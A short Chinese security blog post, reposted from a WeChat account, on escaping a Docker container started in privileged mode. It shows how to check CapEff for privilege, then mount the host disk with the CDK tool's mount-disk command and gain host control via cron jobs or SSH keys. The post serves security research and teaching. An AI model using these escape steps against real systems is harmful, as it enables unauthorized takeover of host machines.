文章前言
在Docker中Privileged是一种特殊的权限模式,它允许Docker容器在启动时获取到与宿主机相同的权限级别。具体来说,Privileged权限可以让容器拥有以下能力:
1、访问宿主机的所有设备文件
2、在容器内部运行与宿主机上相同的内核模块
3、能够修改容器内部的网络配置
4、可以使用mount命令挂载宿主机上任意文件系统
需要注意的是使用Privileged权限可以给容器带来更高的权限,但同时也会带来安全风险。因此,在使用Privileged权限时应该非常谨慎,并且只应该在特定场景下使用,例如需要进行底层系统调试或者测试等需要访问宿主机资源的场景。
漏洞概述
操作者使用特权模式启动的容器时,Docker管理员可以通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令
环境搭建
docker run -v /home/ubuntu/cdk:/cdk --rm -it --privileged ubuntu bash
特权检测
在容器中时可以通过如下参数检测当前容器是否是以特权模式启动:
cat /proc/self/status | grep CapEff
如果是以特权模式启动的话,CapEff对应的掩码值为0000003fffffffff
通过capsh命令可以解码出具体的Capabilitie
漏洞利用
Step 1:容器内部执行以下命令
./cdk run mount-disk
Step 2:在容器内部进入挂载目录,直接管理宿主机磁盘文件
cd /tmp/cdk_dyyop
ls -al
Step 3:之后写入计划任务或者通过写入SSH公钥并进行远程连接获取主机权限即可(ubuntu中计划任务总是有问题很迷)
原文始发于微信公众号(七芒星实验室):Docker Privileged特权逃逸
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论